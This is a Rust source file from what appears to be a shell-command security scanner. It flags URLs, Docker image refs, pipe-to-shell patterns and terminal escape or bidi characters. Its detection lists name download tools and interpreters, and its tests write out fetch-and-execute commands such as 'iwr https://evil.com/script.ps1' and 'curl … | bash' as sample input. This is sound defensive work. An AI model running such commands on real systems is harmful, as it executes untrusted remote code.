Skip to main content

tirith_core/
extract.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
/// Context for Tier 1 scanning.
///
/// Selects which generated Tier 1 regex `tier1_scan` applies to its input.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
    /// Exec-time: command about to be executed (check subcommand).
    Exec,
    /// Paste-time: content being pasted (paste subcommand).
    Paste,
}
15
// Include generated Tier 1 patterns from build.rs declarative pattern table.
// The file is produced at build time and spliced in from `OUT_DIR`.
// NOTE(review): `dead_code` is presumably allowed because some generated items
// (e.g. the fragment counts) are only read from the test module in this file.
#[allow(dead_code)]
mod tier1_generated {
    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
}
21
/// Expose the build-time extractor IDs for test-time cross-referencing.
///
/// Returns the generated `EXTRACTOR_IDS` table unchanged.
pub fn extractor_ids() -> &'static [&'static str] {
    tier1_generated::EXTRACTOR_IDS
}
26
/// Tier 1 exec-time regex — generated from declarative pattern table in build.rs.
///
/// Compiled on first use; panics at that point if the generated pattern is not a valid regex.
static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
});

/// Tier 1 paste-time regex — exec patterns PLUS paste-only patterns (e.g. non-ASCII).
///
/// Compiled on first use; panics at that point if the generated pattern is not a valid regex.
static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
});

/// Standard URL extraction regex for Tier 3.
///
/// Two alternatives are matched:
/// * `http`, `https`, `ftp`, `ssh` or `git` followed by `://` and everything up to the next
///   whitespace, quote or angle bracket;
/// * scp-style `user@host:path`, where user and host consist of ASCII alphanumerics,
///   `.`, `_` and `-`, and the path runs up to the next whitespace, quote or angle bracket.
static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(
        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
    )
    .expect("url regex must compile")
});
44
/// Outcome of a paste-time byte scan (see `scan_bytes`).
///
/// Each flag summarises one category of suspicious content; `details` lists the
/// individual findings in the order they were encountered.
#[derive(Debug, Clone, Default, PartialEq, Eq)]
pub struct ByteScanResult {
    /// An ESC byte introducing a CSI/OSC/APC/DCS sequence, or a trailing ESC, was seen.
    pub has_ansi_escapes: bool,
    /// A control byte below 0x20 (other than `\n`, `\t` and ESC) or DEL (0x7F) was seen.
    pub has_control_chars: bool,
    /// A Unicode bidirectional control character was seen.
    pub has_bidi_controls: bool,
    /// A zero-width Unicode character was seen.
    pub has_zero_width: bool,
    /// The input as a whole is not valid UTF-8.
    pub has_invalid_utf8: bool,
    /// One entry per individual finding.
    pub details: Vec<ByteFinding>,
}

/// A single suspicious byte (or multi-byte character) found during a byte scan.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct ByteFinding {
    /// Byte offset of the finding within the scanned input.
    pub offset: usize,
    /// The byte at `offset`; for multi-byte characters this is the lead byte.
    pub byte: u8,
    /// Human-readable description of the finding.
    pub description: String,
}
60
61/// Tier 1: Fast scan for URL-like content. Returns true if full analysis needed.
62pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
63    match context {
64        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
65        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
66    }
67}
68
69/// Scan raw bytes for control characters (paste-time, Tier 1 step 1).
70pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
71    let mut result = ByteScanResult {
72        has_ansi_escapes: false,
73        has_control_chars: false,
74        has_bidi_controls: false,
75        has_zero_width: false,
76        has_invalid_utf8: false,
77        details: Vec::new(),
78    };
79
80    // Check for invalid UTF-8
81    if std::str::from_utf8(input).is_err() {
82        result.has_invalid_utf8 = true;
83    }
84
85    let len = input.len();
86    let mut i = 0;
87    while i < len {
88        let b = input[i];
89
90        // Escape sequences: CSI (\e[), OSC (\e]), APC (\e_), DCS (\eP)
91        if b == 0x1b {
92            if i + 1 < len {
93                let next = input[i + 1];
94                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
95                    result.has_ansi_escapes = true;
96                    result.details.push(ByteFinding {
97                        offset: i,
98                        byte: b,
99                        description: match next {
100                            b'[' => "CSI escape sequence",
101                            b']' => "OSC escape sequence",
102                            b'_' => "APC escape sequence",
103                            b'P' => "DCS escape sequence",
104                            _ => "escape sequence",
105                        }
106                        .to_string(),
107                    });
108                    i += 2;
109                    continue;
110                }
111            } else {
112                // Trailing lone ESC
113                result.has_ansi_escapes = true;
114                result.details.push(ByteFinding {
115                    offset: i,
116                    byte: b,
117                    description: "trailing escape byte".to_string(),
118                });
119            }
120        }
121
122        // Control characters (< 0x20, excluding common whitespace and ESC)
123        if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
124            result.has_control_chars = true;
125            result.details.push(ByteFinding {
126                offset: i,
127                byte: b,
128                description: format!("control character 0x{b:02x}"),
129            });
130        }
131
132        // DEL character
133        if b == 0x7F {
134            result.has_control_chars = true;
135            result.details.push(ByteFinding {
136                offset: i,
137                byte: b,
138                description: "control character 0x7f (DEL)".to_string(),
139            });
140        }
141
142        // Check for UTF-8 multi-byte sequences that are bidi or zero-width
143        if b >= 0xc0 {
144            // Try to decode UTF-8 character
145            let remaining = &input[i..];
146            if let Some(ch) = std::str::from_utf8(remaining)
147                .ok()
148                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
149                .and_then(|s| s.chars().next())
150            {
151                // Bidi controls
152                if is_bidi_control(ch) {
153                    result.has_bidi_controls = true;
154                    result.details.push(ByteFinding {
155                        offset: i,
156                        byte: b,
157                        description: format!("bidi control U+{:04X}", ch as u32),
158                    });
159                }
160                // Zero-width characters
161                if is_zero_width(ch) {
162                    result.has_zero_width = true;
163                    result.details.push(ByteFinding {
164                        offset: i,
165                        byte: b,
166                        description: format!("zero-width character U+{:04X}", ch as u32),
167                    });
168                }
169                i += ch.len_utf8();
170                continue;
171            }
172        }
173
174        i += 1;
175    }
176
177    result
178}
179
/// Check if a character is a bidi control.
///
/// Covers the characters carrying the Unicode `Bidi_Control` property: the three
/// directional marks (ALM, LRM, RLM), the embedding/override controls and the
/// isolate controls.
fn is_bidi_control(ch: char) -> bool {
    matches!(
        ch,
        '\u{061C}' // ALM
        | '\u{200E}' // LRM
        | '\u{200F}' // RLM
        | '\u{202A}' // LRE
        | '\u{202B}' // RLE
        | '\u{202C}' // PDF
        | '\u{202D}' // LRO
        | '\u{202E}' // RLO
        | '\u{2066}' // LRI
        | '\u{2067}' // RLI
        | '\u{2068}' // FSI
        | '\u{2069}' // PDI
    )
}
197
/// Report whether `ch` is one of the zero-width characters this scanner looks for.
fn is_zero_width(ch: char) -> bool {
    // ZWSP, ZWNJ, ZWJ, BOM / ZWNBSP
    const ZERO_WIDTH: [char; 4] = ['\u{200B}', '\u{200C}', '\u{200D}', '\u{FEFF}'];
    ZERO_WIDTH.contains(&ch)
}
208
209/// Tier 3: Extract URL-like patterns from a command string.
210/// Uses shell-aware tokenization, then extracts URLs from each segment.
211pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
212    let segments = tokenize::tokenize(input, shell);
213    let mut results = Vec::new();
214
215    for (seg_idx, segment) in segments.iter().enumerate() {
216        // Extract standard URLs from raw text
217        for mat in URL_REGEX.find_iter(&segment.raw) {
218            let raw = mat.as_str().to_string();
219            let url = parse::parse_url(&raw);
220            results.push(ExtractedUrl {
221                raw,
222                parsed: url,
223                segment_index: seg_idx,
224                in_sink_context: is_sink_context(segment, &segments),
225            });
226        }
227
228        // Check for schemeless URLs in sink contexts
229        // Skip for docker/podman/nerdctl commands since their args are handled as DockerRef
230        let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
231            let cmd_lower = cmd.to_lowercase();
232            matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
233        });
234        if is_sink_context(segment, &segments) && !is_docker_cmd {
235            for arg in &segment.args {
236                let clean = strip_quotes(arg);
237                if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
238                    results.push(ExtractedUrl {
239                        raw: clean.clone(),
240                        parsed: UrlLike::SchemelessHostPath {
241                            host: extract_host_from_schemeless(&clean),
242                            path: extract_path_from_schemeless(&clean),
243                        },
244                        segment_index: seg_idx,
245                        in_sink_context: true,
246                    });
247                }
248            }
249        }
250
251        // Check for Docker refs in docker commands
252        if let Some(cmd) = &segment.command {
253            let cmd_lower = cmd.to_lowercase();
254            if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
255                if let Some(docker_subcmd) = segment.args.first() {
256                    let subcmd_lower = docker_subcmd.to_lowercase();
257                    if subcmd_lower == "build" {
258                        // For build, only -t/--tag values are image refs
259                        let mut i = 1;
260                        while i < segment.args.len() {
261                            let arg = strip_quotes(&segment.args[i]);
262                            if (arg == "-t" || arg == "--tag") && i + 1 < segment.args.len() {
263                                let tag_val = strip_quotes(&segment.args[i + 1]);
264                                if !tag_val.is_empty() {
265                                    let docker_url = parse::parse_docker_ref(&tag_val);
266                                    results.push(ExtractedUrl {
267                                        raw: tag_val,
268                                        parsed: docker_url,
269                                        segment_index: seg_idx,
270                                        in_sink_context: true,
271                                    });
272                                }
273                                i += 2;
274                            } else if arg.starts_with("-t") && arg.len() > 2 {
275                                let tag_val = strip_quotes(&arg[2..]);
276                                let docker_url = parse::parse_docker_ref(&tag_val);
277                                results.push(ExtractedUrl {
278                                    raw: tag_val,
279                                    parsed: docker_url,
280                                    segment_index: seg_idx,
281                                    in_sink_context: true,
282                                });
283                                i += 1;
284                            } else if let Some(val) = arg.strip_prefix("--tag=") {
285                                let tag_val = strip_quotes(val);
286                                let docker_url = parse::parse_docker_ref(&tag_val);
287                                results.push(ExtractedUrl {
288                                    raw: tag_val,
289                                    parsed: docker_url,
290                                    segment_index: seg_idx,
291                                    in_sink_context: true,
292                                });
293                                i += 1;
294                            } else {
295                                i += 1;
296                            }
297                        }
298                    } else if subcmd_lower == "image" {
299                        // docker image pull/push/inspect — actual subcmd is args[1]
300                        if let Some(image_subcmd) = segment.args.get(1) {
301                            let image_subcmd_lower = image_subcmd.to_lowercase();
302                            if matches!(
303                                image_subcmd_lower.as_str(),
304                                "pull" | "push" | "inspect" | "rm" | "tag"
305                            ) {
306                                extract_first_docker_image(
307                                    &segment.args[2..],
308                                    seg_idx,
309                                    &mut results,
310                                );
311                            }
312                        }
313                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
314                        // First non-flag arg is image, then stop
315                        extract_first_docker_image(&segment.args[1..], seg_idx, &mut results);
316                    }
317                }
318            }
319        }
320    }
321
322    results
323}
324
/// An extracted URL with context.
#[derive(Debug, Clone)]
pub struct ExtractedUrl {
    /// The text the entry was extracted from: a regex match or a quote-stripped argument.
    pub raw: String,
    /// Parsed form of `raw`.
    pub parsed: UrlLike,
    /// Index of the tokenized segment the entry was found in.
    pub segment_index: usize,
    /// Whether the entry was found in a sink (executing/downloading) context.
    pub in_sink_context: bool,
}
333
334/// Common value-taking flags across docker subcommands.
335const DOCKER_VALUE_FLAGS: &[&str] = &["--platform", "--format", "--filter", "-f", "--label", "-l"];
336
337/// Extract the first non-flag argument as a Docker image reference.
338fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
339    let mut skip_next = false;
340    for arg in args {
341        if skip_next {
342            skip_next = false;
343            continue;
344        }
345        let clean = strip_quotes(arg);
346        if clean == "--" {
347            break;
348        }
349        if clean.starts_with("--") && clean.contains('=') {
350            continue; // --flag=value, skip
351        }
352        if clean.starts_with('-') {
353            if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
354                skip_next = true;
355            }
356            continue;
357        }
358        if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
359            let docker_url = parse::parse_docker_ref(&clean);
360            results.push(ExtractedUrl {
361                raw: clean,
362                parsed: docker_url,
363                segment_index: seg_idx,
364                in_sink_context: true,
365            });
366        }
367        break; // Only first non-flag arg is the image
368    }
369}
370
371/// Check if a segment is in a "sink" context (executing/downloading).
372fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
373    if let Some(cmd) = &segment.command {
374        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
375        let cmd_lower = cmd_base.to_lowercase();
376        if is_source_command(&cmd_lower) {
377            return true;
378        }
379    }
380
381    // Check if this segment pipes into a sink
382    if let Some(sep) = &segment.preceding_separator {
383        if sep == "|" || sep == "|&" {
384            // This segment receives piped input — check if it's an interpreter
385            if let Some(cmd) = &segment.command {
386                let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
387                if is_interpreter(cmd_base) {
388                    return true;
389                }
390            }
391        }
392    }
393
394    false
395}
396
/// Report whether `cmd` is one of the commands treated as a download/execute source.
///
/// The comparison is exact; callers are expected to pass an already lowercased name.
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        "curl",
        "wget",
        "fetch",
        "scp",
        "rsync",
        "git",
        "ssh",
        "docker",
        "podman",
        "nerdctl",
        "pip",
        "pip3",
        "npm",
        "npx",
        "yarn",
        "pnpm",
        "go",
        "cargo",
        "iwr",
        "irm",
        "invoke-webrequest",
        "invoke-restmethod",
    ];
    SOURCE_COMMANDS.iter().any(|&known| known == cmd)
}
424
/// Report whether `cmd` names an interpreter that would execute piped input.
///
/// The comparison is exact (case-sensitive) against a fixed list of names.
fn is_interpreter(cmd: &str) -> bool {
    const INTERPRETERS: &[&str] = &[
        "sh",
        "bash",
        "zsh",
        "dash",
        "ksh",
        "python",
        "python3",
        "node",
        "perl",
        "ruby",
        "php",
        "iex",
        "invoke-expression",
    ];
    INTERPRETERS.iter().any(|&known| known == cmd)
}
442
/// Trim surrounding whitespace and remove one pair of matching outer quotes.
///
/// Only a leading and trailing quote of the same kind (`"` or `'`) are removed;
/// a lone quote character or mismatched quotes are left in place.
fn strip_quotes(s: &str) -> String {
    let trimmed = s.trim();
    ['"', '\'']
        .iter()
        .find_map(|&quote| trimmed.strip_prefix(quote)?.strip_suffix(quote))
        .unwrap_or(trimmed)
        .to_string()
}
453
/// Heuristically decide whether `s` looks like a schemeless `host[/path]` argument.
///
/// The host part is everything before the first `/`. It qualifies when it
/// * does not belong to a flag (the argument must not start with `-`),
/// * contains a dot and no space,
/// * does not end in a common file extension (e.g. `install.sh`), compared
///   case-insensitively, and
/// * ends in a label of 2 to 63 ASCII letters (the TLD).
fn looks_like_schemeless_host(s: &str) -> bool {
    // Extensions that mark the host part as a local file name rather than a domain.
    const FILE_EXTS: &[&str] = &[
        ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h", ".txt", ".md", ".json",
        ".yaml", ".yml", ".xml", ".html", ".css", ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip",
        ".gz", ".bz2", ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so", ".log",
        ".conf", ".cfg", ".ini", ".toml",
    ];

    // Not a flag
    if s.starts_with('-') {
        return false;
    }
    // First component before / or end should look like a domain
    let host_part = s.split('/').next().unwrap_or(s);
    if !host_part.contains('.') || host_part.contains(' ') {
        return false;
    }
    // Exclude args where the host part looks like a file (e.g., "install.sh")
    // Only check the host part (before first /), not the full string with path
    let host_lower = host_part.to_lowercase();
    if FILE_EXTS.iter().any(|ext| host_lower.ends_with(ext)) {
        return false;
    }
    // The host part contains a dot, so there are always at least two labels;
    // the last one (TLD) must be 2-63 alphabetic chars.
    let tld = host_part.rsplit('.').next().unwrap_or(host_part);
    (2..=63).contains(&tld.len()) && tld.chars().all(|c| c.is_ascii_alphabetic())
}
485
/// Return the host part of a schemeless `host/path` string: everything before the
/// first `/`, or the whole string when there is no `/`.
fn extract_host_from_schemeless(s: &str) -> String {
    let host = match s.find('/') {
        Some(slash) => &s[..slash],
        None => s,
    };
    host.to_owned()
}
489
/// Return the path part of a schemeless `host/path` string: everything from the
/// first `/` onwards (slash included), or an empty string when there is no `/`.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/')
        .map_or_else(String::new, |slash| s[slash..].to_owned())
}
497
// Unit tests for Tier 1 scanning, the paste-time byte scan and Tier 3 URL extraction.
// The `tier1_scan` expectations depend on the patterns generated by build.rs.
#[cfg(test)]
mod tests {
    use super::*;

    // ---- Tier 1: exec-time pattern ----

    #[test]
    fn test_tier1_exec_matches_url() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_simple() {
        assert!(!tier1_scan("ls -la", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_echo() {
        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bash() {
        assert!(tier1_scan("something | bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_sudo_bash() {
        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_env_bash() {
        assert!(tier1_scan("something | env bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bin_bash() {
        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_git_scp() {
        assert!(tier1_scan(
            "git clone git@github.com:user/repo",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_punycode() {
        assert!(tier1_scan(
            "curl https://xn--example-cua.com",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_docker() {
        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_iwr() {
        assert!(tier1_scan(
            "iwr https://evil.com/script.ps1",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_curl() {
        assert!(tier1_scan(
            "curl https://example.com/install.sh",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_lookalike_tld() {
        assert!(tier1_scan("open file.zip", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_shortener() {
        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
    }

    // ---- Tier 1: paste-time pattern ----

    #[test]
    fn test_tier1_paste_matches_non_ascii() {
        assert!(tier1_scan("café", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_paste_exec_patterns_also_match() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_exec_no_non_ascii() {
        // Non-ASCII should NOT trigger exec-time scan
        assert!(!tier1_scan("echo café", ScanContext::Exec));
    }

    // ---- Byte scan ----

    #[test]
    fn test_byte_scan_ansi() {
        let input = b"hello \x1b[31mred\x1b[0m world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    #[test]
    fn test_byte_scan_control_chars() {
        let input = b"hello\rworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    #[test]
    fn test_byte_scan_bidi() {
        let input = "hello\u{202E}dlrow".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_bidi_controls);
    }

    #[test]
    fn test_byte_scan_zero_width() {
        let input = "hel\u{200B}lo".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_zero_width);
    }

    #[test]
    fn test_byte_scan_clean() {
        let input = b"hello world\n";
        let result = scan_bytes(input);
        assert!(!result.has_ansi_escapes);
        assert!(!result.has_control_chars);
        assert!(!result.has_bidi_controls);
        assert!(!result.has_zero_width);
    }

    // ---- Tier 3: URL extraction ----

    #[test]
    fn test_extract_urls_basic() {
        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
        assert_eq!(urls.len(), 1);
        assert_eq!(urls[0].raw, "https://example.com/install.sh");
    }

    #[test]
    fn test_extract_urls_pipe() {
        let urls = extract_urls(
            "curl https://example.com/install.sh | bash",
            ShellType::Posix,
        );
        assert!(!urls.is_empty());
        assert!(urls[0].in_sink_context);
    }

    #[test]
    fn test_extract_urls_scp() {
        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
        assert!(!urls.is_empty());
        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
    }

    #[test]
    fn test_extract_docker_ref() {
        let urls = extract_urls("docker pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }

    #[test]
    fn test_extract_powershell_iwr() {
        let urls = extract_urls(
            "iwr https://example.com/script.ps1 | iex",
            ShellType::PowerShell,
        );
        assert!(!urls.is_empty());
    }

    // ---- Helpers ----

    #[test]
    fn test_strip_quotes_single_char() {
        // A lone quote character is not a quoted string and must be left alone.
        assert_eq!(strip_quotes("\""), "\"");
        assert_eq!(strip_quotes("'"), "'");
    }

    #[test]
    fn test_strip_quotes_empty() {
        assert_eq!(strip_quotes(""), "");
    }

    #[test]
    fn test_scan_bytes_bel_vt_del() {
        // BEL (0x07)
        let input = b"hello\x07world";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        // VT (0x0B)
        let input = b"hello\x0Bworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        // FF (0x0C)
        let input = b"hello\x0Cworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        // DEL (0x7F)
        let input = b"hello\x7Fworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    #[test]
    fn test_scan_bytes_osc_apc_dcs() {
        // OSC: \e]
        let input = b"hello\x1b]0;title\x07world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);

        // APC: \e_
        let input = b"hello\x1b_dataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);

        // DCS: \eP
        let input = b"hello\x1bPdataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    #[test]
    fn test_schemeless_long_tld() {
        // TLDs longer than six letters must still be accepted.
        assert!(looks_like_schemeless_host("example.academy"));
        assert!(looks_like_schemeless_host("example.photography"));
    }

    #[test]
    fn test_segment_index_correct() {
        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
        // Each URL should have the segment index of the segment it came from
        for url in &urls {
            // segment_index should be 0 or 1, not an incrementing counter
            assert!(url.segment_index <= 1);
        }
    }

    #[test]
    fn test_docker_build_context_not_image() {
        let urls = extract_urls("docker build .", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(
            docker_urls.len(),
            0,
            "build context '.' should not be treated as image"
        );
    }

    #[test]
    fn test_docker_image_subcmd() {
        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }

    /// Constraint #2: Verify that EXTRACTOR_IDS is non-empty and
    /// that all generated fragment counts are positive.
    /// This is a module boundary enforcement test — ensures no secret
    /// extractors exist outside the declarative pattern table.
    #[test]
    fn test_tier1_module_boundary_enforcement() {
        // Verify extractor IDs are generated
        let ids = tier1_generated::EXTRACTOR_IDS;
        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
        // Verify exec and paste fragment counts
        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
        assert!(exec_count > 0, "Must have exec fragments");
        assert!(
            paste_count >= exec_count,
            "Paste fragments must be superset of exec fragments"
        );
        // Verify the generated patterns are valid regexes
        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
            .expect("Generated exec pattern must be valid regex");
        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
            .expect("Generated paste pattern must be valid regex");
    }
}